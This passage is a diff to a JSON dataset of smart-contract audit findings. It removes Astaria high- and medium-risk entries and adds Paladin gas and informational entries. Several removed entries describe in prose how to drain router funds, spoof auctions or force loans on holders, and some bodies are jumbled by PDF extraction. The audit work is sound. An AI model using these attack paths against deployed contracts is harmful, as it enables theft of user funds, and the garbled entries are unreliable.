s.auctionData[collateralId] will have the past auction data. s.lienMeta[collateralId].atLiquidation will be true. That means future calls to commitToLiens by holders of the same collateral will revert.", + "title": "Add validation checks on addresses", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", + "body": "Missing validation checks on addresses passed into the constructor functions. Adding these checks on _gaugeController and _chest can prevent costly errors the during deployment of the contract. Also in function claim() and claimQuest() there is no zero check for for account argument.", "labels": [ "Spearbit", - "Astaria", - "Severity: High Risk" + "Paladin", + "Severity: Low Risk" ] }, { - "title": "ClearingHouse cannot detect if a call from Seaport comes from a genuine listing or auction", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "Anyone can create a SeaPort order with one of the considerations' recipients set to a ClearingHouse with a collateralId that is genuinely already set for auction. Once the spoofed order settles, SeaPort calls into this fallback function and causes the genuine Astaria auction to settle. This allows an attacker to set random items on sale on SeaPort with funds directed here (small buying prices) to settle genuine Astaria auctions on the protocol. This causes: The Astaria auction payees and the liquidator would not receive what they would expect that should come from the auction. And if payee is a public vault it would introduce incorrect parameters into its system. 
Lien data (s.lienMeta[lid]) and the lien token get deleted/burnt. Collateral token and data get burnt/deleted. When the actual genuine auction settles and calls back s.collateralIdToAuction[collateralId] check. to here, it will revert due to", + "title": "Changing public constant variables to non-public can save gas", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", + "body": "Several constants are public and thus have a getter function. called from the outside, therefore it is not necessary to make them public. It is unlikely for these values to be", "labels": [ "Spearbit", - "Astaria", - "Severity: High Risk" + "Paladin", + "Severity: Gas Optimization" ] }, { - "title": "c.lienRequest.strategy.vault is not checked to be a registered vault when commitToLiens is called", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "mentation(c.lienRequest.strategy.vault).commitToLien( ... ) of c.lienRequest.strategy.vault is not checked whether it is a registered vault within the system (by checking s.vaults). The caller can set this value to any address they would desire and potentially perform some unwanted actions. For example, the user could spoof all the values in commitments so that the later dependant contracts' checks are skipped and lastly we end up transferring funds: value after and the s.TRANSFER_PROXY.tokenTransferFrom( address(s.WETH), address(this), // <--- AstariaRouter address(msg.sender), totalBorrowed ); Not that since all checks are skipped, the caller can also indirectly set totalBorrowed to any value they would desire. And so, if AstariaRouter would hold any wETH at any point in time. Anyone can craft a payload to commitToLiens to drain its wETH balance.", + "title": "Using uint instead of bool to optimize gas usage", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", + "body": "A bool is more costly than uint256. Because each write action generates an additional SLOAD to read the contents of the slot, change the bits occupied by bool and finally write back. contract BooleanTest { mapping(address => bool) approvedManagers; // Gas Cost : 44144 function approveManager(address newManager) external{ approvedManagers[newManager] = true; } mapping(address => uint256) approvedManagersWithoutBoolean; // Gas Cost : 44069 function approveManagerWithoutBoolean(address newManager) external{ approvedManagersWithoutBoolean[newManager] = 1; } }", "labels": [ "Spearbit", - "Astaria", - "Severity: High Risk" + "Paladin", + "Severity: Gas Optimization" ] }, { - "title": "Anyone can take a loan out on behalf of any collateral holder at any terms", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "In the _validateCommitment() function, the initial checks are intended to ensure that the caller who is requesting the lien is someone who should have access to the collateral that it's being taken out against. The caller also inputs a receiver, who will be receiving the lien. In this validation, this receiver is checked against the collateral holder, and the validation is approved in the case that receiver == holder. However, this does not imply that the collateral holder wants to take this loan. 
This opens the door to a malicious lender pushing unwanted loans on holders of collateral by calling commitToLien with their collateralId, as well as their address set to the receiver. This will pass the receiver == holder check and execute the loan. In the best case, the borrower discovers this and quickly repays the loan, incurring a fee and small amount of interest. In the worst case, the borrower doesn't know this happens, and their collateral is liquidated.", + "title": "Optimize && operator usage", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", + "body": "The check && consumes more gas than using multiple require statements. Example test can be seen below: //Gas Cost: 22515 function increaseQuestReward(uint256 newRewardPerVote, uint256 addedRewardAmount, uint256 feeAmount) ,! public { require(newRewardPerVote != 0 && addedRewardAmount != 0 && feeAmount != 0, \"QuestBoard: Null ,! amount\"); } //Gas Cost: 22477 function increaseQuestRewardTest(uint256 newRewardPerVote, uint256 addedRewardAmount, uint256 ,! feeAmount) public { require(newRewardPerVote != 0, \"QuestBoard: Null amount\"); require(addedRewardAmount != 0, \"QuestBoard: Null amount\"); require(feeAmount != 0, \"QuestBoard: Null amount\"); } Note : It costs more gas to deploy but it is worth it after X calls. Trade-offs should be considered.", "labels": [ "Spearbit", - "Astaria", - "Severity: High Risk" + "Paladin", + "Severity: Gas Optimization" ] }, { - "title": "Strategist Interest Rewards will be 10x higher than expected due to incorrect divisor", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "VAULT_FEE is set as an immutable argument in the construction of new vaults, and is intended to be set in basis points. However, when the strategist interest rewards are calculated in _handleStrategistIntere- stReward(), the VAULT_FEE is only divided by 1000. The result is that the fee calculated by the function will be 10x higher than expected, and the strategist will be dramatically overpaid.", + "title": "Unnecesary value set to 0", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", + "body": "Since all default values in solidity are already 0 it riod.rewardAmountDistributed = 0; here as it should already be 0. is unnecessary to include _questPe-", "labels": [ "Spearbit", - "Astaria", - "Severity: High Risk" + "Paladin", + "Severity: Gas Optimization" ] }, { - "title": "The lower bound for liquidationInitialAsk for new lines needs to be stricter", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "params.lien.details.liquidationInitialAsk ( Lnew ) is only compared to params.amount ( Anew ) whereas in _appendStack newStack[j].lien.details.liquidationInitialAsk ( Lj ) is compared to poten- tialDebt. potentialDebt is the aggregated sum of all potential owed amount at the end of each position/lien. So in _appendStack we have: onew + on + (cid:1) (cid:1) (cid:1) + oj (cid:20) Lj Where oj potential interest at the end of its term. 
is _getOwed(newStack[j], newStack[j].point.end) which is the amount for the stack slot plus the So it would make sense to enforce a stricter inequality for Lnew : (1 + r (tend (cid:0) tnow ) 1018 )Anew = onew (cid:20) Lnew The big issue regarding the current lower bound is when the borrower only takes one lien and for this lien liqui- dationInitialAsk == amount (or they are close). Then at any point during the lien term (maybe very close to the end), the borrower can atomically self liquidate and settle the Seaport auction in one transaction. This way the borrower can skip paying any interest (they would need to pay OpenSea fees and potentially royalty fees) and plus they would receive liquidation fees.", + "title": "Optimize unsigned integer comparison", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", + "body": "Check != 0 costs less gas compared to > 0 for unsigned integers in require statements with the optimizer enabled. While it may seem that > 0 is cheaper than !=0 this is only true without the optimizer being enabled and outside a require statement. If the optimizer is enabled at 10k and it is in a require statement, it would be more gas efficient.", "labels": [ "Spearbit", - "Astaria", - "Severity: High Risk" + "Paladin", + "Severity: Gas Optimization" ] }, { - "title": "commitToLiens transfers extra assets to the borrower when protocol fee is present", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "totalBorrowed is the sum of all commitments[i].lienRequest.amount But if s.feeTo is set, some of funds/assets from the vaults get transefered to s.feeTo when _handleProtocolFee is called and only the remaining is sent to the ROUTER(). So in this scenario, the total amount of assets sent to ROUTER() (so that it can be transferred to msg.sender) is up to rounding errors: (1 (cid:0) np dp )T Where: T is the totalBorrowed np is s.protocolFeeNumerator dp is s.protocolFeeDenominator But we are transferring T to msg.sender which is more than we are supposed to send,", + "title": "Use memory instead of storage in closeQuestPeriod() and closePartOfQuestPeriod()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", + "body": "In functions closeQuestPeriod() and closePartOfQuestPeriod() a storage pointer _quest is set to quests[questsForPeriod[i]]. This is normally used when write access to the location is need. Nevertheless _quest is read only, to a copy of quests[questsForPeriod[i]] is also sufficient. This can save some gas. function closeQuestPeriod(uint256 period) external isAlive onlyAllowed nonReentrant { ... Quest storage _quest = quests[questsForPeriod[i]]; ... gaugeController.checkpoint_gauge(_quest.gauge); // read only access of _quest ... uint256 periodBias = gaugeController.points_weight(_quest.gauge, nextPeriod).bias; // read only access of _quest ... IERC20(_quest.rewardToken).safeTransfer(distributor, toDistributeAmount); // read only access of _quest ... ,! ,! } function closePartOfQuestPeriod(uint256 period, uint256[] calldata questIDs) external isAlive onlyAllowed nonReentrant { ... Quest storage _quest = quests[questIDs[i]]; ... gaugeController.checkpoint_gauge(_quest.gauge); // read only access of _quest ... uint256 periodBias = gaugeController.points_weight(_quest.gauge, nextPeriod).bias; // read only access of _quest ... 
IERC20(_quest.rewardToken).safeTransfer(distributor, toDistributeAmount); // read only access of _quest ... }", "labels": [ "Spearbit", - "Astaria", - "Severity: High Risk" + "Paladin", + "Severity: Gas Optimization" ] }, { - "title": "Withdraw proxy's claim() endpoint updates public vault's yIntercept incorrectly.", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "Let y_0 be the yIntercept of the public vault in question, n the current epoch for the public vault, E_{n-1} the expected storage parameter of the previous withdraw proxy, B_{n-1} the asset balance of the previous withdraw proxy, W_{n-1} the withdrawReserveReceived of the previous withdraw proxy, S_{n-1} the total supply of the previous withdraw proxy, S_v the total supply of the public vault when processEpoch() was last called on the public vault, B_v the total balance of the public vault when processEpoch() was last called on the public vault, V the public vault, and P_{n-1} the previous withdraw proxy. Then y_0 is updated/decremented according to the formula (up to rounding errors due to division): y_0 = y_0 - max(0, E_{n-1} - (B_{n-1} - W_{n-1})) * (1 - S_{n-1}/S_v). Whereas the amount A of assets transferred from P_{n-1} to V is A = (B_{n-1} - W_{n-1}) * (1 - S_{n-1}/S_v), and the amount B of assets left in P_{n-1} after this transfer would be: B = W_{n-1} + (B_{n-1} - W_{n-1}) * S_{n-1}/S_v. (B_{n-1} - W_{n-1}) is supposed to represent the payment the withdraw proxy receives from Seaport auctions plus the amount of assets transferred to it by external actors. So A represents the portion of this amount for users who have not withdrawn from the public vault on the previous epoch; it is transferred to V and so y_0 should be compensated positively. Also note that this amount might be bigger than E_{n-1} if a lien has a really high liquidationInitialAsk and its auction fulfills/matches near that price on Seaport. So it is possible that E_{n-1} < A. The current formula for updating y_0 has the following flaws: it only considers updating y_0 when E_{n-1} - (B_{n-1} - W_{n-1}) > 0, which is not always the case, and it decrements y_0 by a portion of E_{n-1}. The correct updating formula for y_0 should be: y_0 = y_0 - E_{n-1} + (B_{n-1} - W_{n-1}) * (1 - S_{n-1}/S_v). Also note, if we let B_{n-1} - W_{n-1} = X_{n-1} + e, where X_{n-1} is the payment received by the withdraw proxy from Seaport auction payments and e (if W_{n-1} is updated correctly) is the amount of assets received from external actors by the previous withdraw proxy, then: B = W_{n-1} + (X_{n-1} + e) * S_{n-1}/S_v = [max(0, B_v - E_{n-1}) + X_{n-1} + e] * S_{n-1}/S_v. The last equality comes from the fact that when the withdraw reserves are fully transferred from the public vault and the current withdraw proxy (if necessary) to the previous withdraw proxy, the amount W_{n-1} would hold should be max(0, B_v - E_{n-1}) * S_{n-1}/S_v.
Related Issue.", + "title": "Revert string size optimization", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", + "body": "Shortening revert strings to fit in 32 bytes will decrease deployment gas and will decrease runtime gas when the revert condition is met. Revert strings using more than 32 bytes require at least one additional mstore, along with additional operations for computing memory offsets.", "labels": [ "Spearbit", - "Astaria", - "Severity: High Risk" + "Paladin", + "Severity: Gas Optimization" ] }, { - "title": "Public vault's yIntercept is not updated when the full amount owed is not paid out by a Seaport auction.", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "When the full amountOwed for a lien is not paid out during the callback from Seaport to a collateral's ClearingHouse and if the payee is a public vault, we would need to decrement the yIntercept, otherwise payee.totalAssets() would reflect a wrong value.", + "title": "Optimize withdrawUnusedRewards() and emergencyWithdraw() with pointers", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", + "body": "The functions withdrawUnusedRewards() and emergencyWithdraw() use periodsByQuest[questID][_questPeriods[i]] several times. It is possible to set a pointer to this record and use that pointer to read and update values. This will save gas and also make the code more readable. function withdrawUnusedRewards(uint256 questID, address recipient) external isAlive nonReentrant { ... if(periodsByQuest[questID][_questPeriods[i]].currentState == PeriodState.ACTIVE) { ... } ... uint256 withdrawableForPeriod = periodsByQuest[questID][_questPeriods[i]].withdrawableAmount; ... if(withdrawableForPeriod > 0){ ... periodsByQuest[questID][_questPeriods[i]].withdrawableAmount = 0; } ... } function emergencyWithdraw(uint256 questID, address recipient) external nonReentrant { ... if(periodsByQuest[questID][_questPeriods[i]].currentState != PeriodState.ACTIVE){ uint256 withdrawableForPeriod = periodsByQuest[questID][_questPeriods[i]].withdrawableAmount; ... if(withdrawableForPeriod > 0){ ... periodsByQuest[questID][_questPeriods[i]].withdrawableAmount = 0; } } else { ... totalWithdraw += periodsByQuest[questID][_questPeriods[i]].rewardAmountPerPeriod; periodsByQuest[questID][_questPeriods[i]].rewardAmountPerPeriod = 0; } ... }", "labels": [ "Spearbit", - "Astaria", - "Severity: High Risk" + "Paladin", + "Severity: Gas Optimization" ] }, { - "title": "LienToken payee not reset on transfer", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "payee and ownerOf are detached in that owners may set payee and an owner may transfer the LienToken to a new owner. payee does not reset on transfer. Exploit scenario: the owner of a LienToken sets themselves as payee; the owner sells the lien to a new owner; the new owner does not update payee; payments go to the address set by the old owner.", + "title": "Needless to initialize variables with default values", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", + "body": "uint256 variables are initialized to a default value of 0 per the Solidity docs. Setting a variable to the default value is unnecessary.", "labels": [ "Spearbit", - "Astaria", - "Severity: High Risk" + "Paladin", + "Severity: Gas Optimization" ] },
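For the "Optimize withdrawUnusedRewards() and emergencyWithdraw() with pointers" finding above, a minimal sketch of the cached-storage-pointer pattern; the reduced QuestPeriod layout and function shape here are illustrative assumptions, not Paladin's actual code:

enum PeriodState { ZERO, ACTIVE, CLOSED }
struct QuestPeriod { PeriodState currentState; uint248 withdrawableAmount; } // hypothetical, reduced layout

contract PointerCachingSketch {
    mapping(uint256 => mapping(uint256 => QuestPeriod)) public periodsByQuest;

    function sweepWithdrawable(uint256 questID, uint256[] calldata periods) external returns (uint256 total) {
        for (uint256 i; i < periods.length; ++i) {
            // One cached storage pointer replaces repeated nested mapping lookups.
            QuestPeriod storage p = periodsByQuest[questID][periods[i]];
            if (p.currentState == PeriodState.ACTIVE) continue;
            uint256 amount = p.withdrawableAmount;
            if (amount > 0) {
                p.withdrawableAmount = 0; // write through the same pointer
                total += amount;
            }
        }
    }
}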
{ - "title": "WithdrawProxy allows redemptions before PublicVault calls transferWithdrawReserve", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "Anytime there is a withdraw pending (i.e. someone holds WithdrawProxy shares), shares may be redeemed so long as totalAssets() > 0 and s.finalAuctionEnd == 0. Under normal operating conditions totalAssets() becomes greater than 0 when the PublicVault calls transferWithdrawReserve. totalAssets() can also be increased to a non-zero value by anyone transferring WETH to the contract. If this occurs and a user attempts to redeem, they will receive a smaller share than they are owed. Exploit scenario: Depositor redeems from PublicVault and receives WithdrawProxy shares. Malicious actor deposits a small amount of WETH into the WithdrawProxy. Depositor accidentally redeems, or is tricked into redeeming, from the WithdrawProxy while totalAssets() is smaller than it should be. PublicVault properly processes the epoch and the full withdrawReserve is sent to the WithdrawProxy. All remaining holders of WithdrawProxy shares receive an outsized share as the previous shares were redeemed for the incorrect value.", + "title": "Optimize the calculation of the currentPeriod", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", + "body": "The retrieval of currentPeriod is relatively gas expensive because it requires an SLOAD instruction (100 gas) every time. Calculating (block.timestamp / WEEK) * WEEK; is cheaper (TIMESTAMP: 2 gas, MUL: 5 gas, DIV: 5 gas). Refer to evm.codes for more information. Additionally, there is a risk that the call to updatePeriod() is forgotten, although it does not happen in the current code. function updatePeriod() public { if (block.timestamp >= currentPeriod + WEEK) { currentPeriod = (block.timestamp / WEEK) * WEEK; } } Note: it is also possible to do all calculations with (block.timestamp / WEEK) instead of (block.timestamp / WEEK) * WEEK, but as the Paladin project has indicated: \"This currentPeriod is a timestamp, showing the start date of the current period, and based from the Curve system (because we want the same timestamp they have in the GaugeController).\"", "labels": [ "Spearbit", - "Astaria", - "Severity: High Risk" + "Paladin", + "Severity: Gas Optimization" ] }, { - "title": "Point.position is not updated for stack slots in _removeStackPosition", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "A new slot's point.position is set to uint8(params.stack.length), which would be its index in the stack. When _removeStackPosition is called to remove a slot, newStack[i].point.position is not updated for indexes that are greater than position in the original stack. Also, slot.point.position is only used when we emit the AddLien and LienStackUpdated events. In both of those cases, we could have used params.stack.length.", + "title": "Change memory to calldata", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", + "body": "For function parameters, it is often more optimal for the reference location to be calldata instead of memory. Changing bytes to calldata will decrease gas usage. OpenZeppelin Pull Request", "labels": [ "Spearbit", - "Astaria", - "Severity: Medium Risk" + "Paladin", + "Severity: Gas Optimization" ] },
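A self-contained sketch of the "Change memory to calldata" suggestion above; the contract and function names are hypothetical:

contract CalldataSketch {
    event Tagged(bytes32 digest);

    // memory: the calldata bytes are copied into memory before use.
    function tagMemory(bytes memory data) external { emit Tagged(keccak256(data)); }

    // calldata: read in place, no copy; cheaper for external functions.
    function tagCalldata(bytes calldata data) external { emit Tagged(keccak256(data)); }
}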
{ - "title": "unchecked may cause under/overflows", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "unchecked should only be used when there is a guarantee of no underflows or overflows, or when they are taken into account. In the absence of certainty, it's better to avoid unchecked to favor correctness over gas efficiency. For instance, if by error protocolFeeNumerator is set to be greater than protocolFeeDenominator, this block in _handleProtocolFee() will underflow: PublicVault.sol#L640, unchecked { amount -= fee; } However, later this reverts due to the ERC20 transfer of an unusually high amount. This is just to demonstrate that unknown bugs can lead to under/overflows. (See PublicVault.sol#L563, LienToken.sol#L424, LienToken.sol#L482, PublicVault.sol#L376, PublicVault.sol#L422.)", + "title": "Caching array length at the beginning of function can save gas", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", + "body": "Caching the array length at the beginning of the function can save gas in several locations. function multiClaim(address account, ClaimParams[] calldata claims) external { require(claims.length != 0, \"MultiMerkle: empty parameters\"); uint256 length = claims.length; // if this is done before the require, the require can use \"length\" ... }", "labels": [ "Spearbit", - "Astaria", - "Severity: Medium Risk" + "Paladin", + "Severity: Gas Optimization" ] }, { - "title": "Multiple ERC4626Router and ERC4626RouterBase functions will always revert", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "The intention of the ERC4626Router.sol functions is that they are approval-less ways to deposit and redeem: // For the below, no approval needed, assumes vault is already max approved As long as the user has approved the TRANSFER_PROXY for WETH, this works for the depositToVault function: WETH is transferred from the user to the router with pullTokens; the router approves the vault for the correct amount of WETH; vault.deposit() is called, which uses safeTransferFrom to transfer WETH from the router into the vault. However, for the redeemMax function, it doesn't work: it approves the vault to spend the router's WETH; vault.redeem() is called, which tries to transfer vault tokens from the router to the vault, and then mints withdraw proxy tokens to the receiver. This logic assumes that the vault tokens would be burned, in which case it would work. But since they are transferred into the vault until the end of the epoch, we require approvals. The same issue also exists in these two functions in ERC4626RouterBase.sol: redeem(): this is where the incorrect approval lives, so the same issue occurs when it is called directly.
withdraw(): the same faulty approval exists in this function.", + "title": "Check amount is greater than 0 to avoid calling safeTransfer() unnecessarily", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", + "body": "A check should be added to make sure amount is greater than 0 to avoid calling safeTransfer() unnecessarily.", "labels": [ "Spearbit", - "Astaria", - "Severity: Medium Risk" + "Paladin", + "Severity: Gas Optimization" ] }, { - "title": "UniV3 tokens with fees can bypass strategist checks", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "Each UniV3 strategy includes a value for fee in nlrDetails that is used to constrain their strategy to UniV3 pools with matching fees. This is enforced with the following check (where details.fee is the strategist's set fee, and fee is the fee returned from Uniswap): if (details.fee != uint24(0) && fee != details.fee) { revert InvalidFee(); } This means that if you set details.fee to 0, this check will pass, even if the real fee is greater than zero.", + "title": "Unchecked{++i} is more efficient than i++", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", + "body": "The function getAllQuestPeriodsForQuestId uses i++ which costs more gas than ++i, especially in a loop. Also, the createQuest function uses nextID += 1 which costs more gas than ++nextID. Finally, the initialization of i = 0 can be skipped, as 0 is the default value.", "labels": [ "Spearbit", - "Astaria", - "Severity: Medium Risk" + "Paladin", + "Severity: Gas Optimization" ] }, { - "title": "If auction time is reduced, withdrawProxy can lock funds from final auctions", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "When a new liquidation happens, the withdrawProxy sets s.finalAuctionEnd to be equal to the new incoming auction end. This will usually be fine, because new auctions start later than old auctions, and they all have the same length. However, if the auction time is reduced on the Router, it is possible for a new auction to have an end time that is sooner than an old auction. The result will be that the WithdrawProxy is claimable before it should be, and then will lock and not allow anyone to claim the funds from the final auction.", + "title": "Could replace claims[i].questID with questID", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", + "body": "Could replace claims[i].questID with questID (as they are equal due to the check above).", "labels": [ "Spearbit", - "Astaria", - "Severity: Medium Risk" + "Paladin", + "Severity: Gas Optimization" ] }, { - "title": "claim() will underflow and revert for all tokens without 18 decimals", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "In the claim() function, the amount to decrease the Y intercept of the vault is calculated as: (s.expected - balance).mulWadDown(10**ERC20(asset()).decimals() - s.withdrawRatio) s.withdrawRatio is represented as a WAD (18 decimals). As a result, using any token with a number of decimals under 17 (assuming the withdraw ratio is greater than 10%) will lead to an underflow and cause the function to revert. In this situation, the token's decimals don't matter. They are captured in s.expected and balance, and are also the scale at which the vault's y-intercept is measured, so there's no need to adjust for them. Note: I know this isn't a risk in the current implementation, since it's WETH only, but since you are planning to generalize to accept all ERC20s, this is important.", + "title": "Change function visibility from public to external", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", + "body": "The function updateRewardToken of the QuestBoard contract could be set external to save gas and improve code quality.", "labels": [ "Spearbit", - "Astaria", - "Severity: Medium Risk" + "Paladin", + "Severity: Gas Optimization" ] },
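A minimal sketch of the loop pattern recommended in the "Unchecked{++i} is more efficient than i++" finding above; the contract and function names are hypothetical:

contract LoopSketch {
    function sum(uint256[] calldata arr) external pure returns (uint256 total) {
        for (uint256 i; i < arr.length; ) { // i = 0 initialization skipped: 0 is the default
            total += arr[i];
            unchecked { ++i; } // overflow check skipped: i is bounded by arr.length
        }
    }
}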
{ - "title": "Call to Royalty Engine can block NFT auction", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "_generateValidOrderParameters() calls ROYALTY_ENGINE.getRoyaltyView() twice. The first call is wrapped in a try/catch. This lets Astaria continue even if getRoyaltyView() reverts. However, the second call is not safe from this. Both these calls have the same parameters passed to them except the price (startingPrice vs endingPrice). In case they are different, there exists a possibility that the second call can revert.", + "title": "Functions isClaimed() and _setClaimed() can be optimized", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", + "body": "The functions isClaimed() and _setClaimed() of the contract MultiMerkleDistributor can be optimized to save gas. See OZ BitMaps for inspiration.", "labels": [ "Spearbit", - "Astaria", - "Severity: Medium Risk" + "Paladin", + "Severity: Gas Optimization" ] },
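A sketch of the bitmap approach the "Functions isClaimed() and _setClaimed() can be optimized" finding points to, using OpenZeppelin's BitMaps as the finding suggests; the (questID, period, index) key structure is an assumption about MultiMerkleDistributor, not its actual storage layout:

import {BitMaps} from "@openzeppelin/contracts/utils/structs/BitMaps.sol";

contract ClaimBitmapSketch {
    using BitMaps for BitMaps.BitMap;

    // 256 claim flags share a single storage slot per bitmap word.
    mapping(uint256 => mapping(uint256 => BitMaps.BitMap)) private _claimed;

    function isClaimed(uint256 questID, uint256 period, uint256 index) public view returns (bool) {
        return _claimed[questID][period].get(index);
    }

    function _setClaimed(uint256 questID, uint256 period, uint256 index) internal {
        _claimed[questID][period].set(index);
    }
}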
{ - "title": "Expired liens taken from public vaults need to be liquidated otherwise processing an epoch halts/reverts", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "s.epochData[s.currentEpoch].liensOpenForEpoch is decremented, or is supposed to be decremented, when for a lien with an end that falls on this epoch: the full payment has been made, or the lien is bought out by a lien that is from a different vault or ends at a higher epoch, or the lien is liquidated. If for some reason a lien expires and no one calls liquidate, then s.epochData[s.currentEpoch].liensOpenForEpoch > 0 will be true and processEpoch() would revert till someone calls liquidate. Note that a lien's end falling in the s.currentEpoch and timeToEpochEnd() == 0 imply that the lien is expired.", + "title": "Missing events for owner only functions", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", + "body": "Several key actions are defined without event declarations. Owner-only functions that change critical parameters can emit events to record these changes on-chain for off-chain monitors/tools/interfaces.", "labels": [ "Spearbit", - "Astaria", - "Severity: Medium Risk" + "Paladin", + "Severity: Informational" ] }, { - "title": "assets < s.depositCap invariant can be broken for public vaults with non-zero deposit caps", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "The following check in mint / deposit does not take into consideration the new shares / amount supplied to the endpoint, since the yIntercept in totalAssets() is only updated after calling super.mint(shares, receiver) or super.deposit(amount, receiver) with the afterDeposit hook. uint256 assets = totalAssets(); if (s.depositCap != 0 && assets >= s.depositCap) { revert InvalidState(InvalidStates.DEPOSIT_CAP_EXCEEDED); } Thus the new shares or amount provided can be a really big number compared to s.depositCap, but the call will still go through.", + "title": "Use nonReentrant modifier in a consistent way", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", + "body": "The functions claim(), claimQuest() and recoverERC20() of contract MultiMerkleDistributor send tokens but don't have a nonReentrant modifier. All other functions that send tokens do have this modifier. Note: as the checks-and-effects pattern is used, this is not strictly necessary. function claim(...) public { ... IERC20(rewardToken).safeTransfer(account, amount); } function claimQuest(...) external { ... IERC20(rewardToken).safeTransfer(account, totalClaimAmount); } function recoverERC20(address token, uint256 amount) external onlyOwner returns(bool) { IERC20(token).safeTransfer(owner(), amount); return true; }", "labels": [ "Spearbit", - "Astaria", - "Severity: Medium Risk" + "Paladin", + "Severity: Informational" ] }, { - "title": "redeemFutureEpoch transfers the shares from the msg.sender to the vault instead of from the owner", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "redeemFutureEpoch transfers the vault shares from the msg.sender to the vault instead of from the owner.", + "title": "Place struct definition at the beginning of the contract", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", + "body": "Per the Solidity Style Guide, the struct definition can be moved to the beginning of the contract.", "labels": [ "Spearbit", - "Astaria", - "Severity: Medium Risk" + "Paladin", + "Severity: Informational" ] },
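For the "Missing events for owner only functions" finding above, a minimal sketch of the suggested pattern; the parameter and event names are hypothetical, not Paladin's:

contract OwnerEventSketch {
    event PlatformFeeUpdated(uint256 oldFee, uint256 newFee); // hypothetical event name

    address public immutable owner = msg.sender;
    uint256 public platformFee;

    function setPlatformFee(uint256 newFee) external {
        require(msg.sender == owner, "not owner");
        emit PlatformFeeUpdated(platformFee, newFee); // on-chain record for off-chain monitors
        platformFee = newFee;
    }
}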
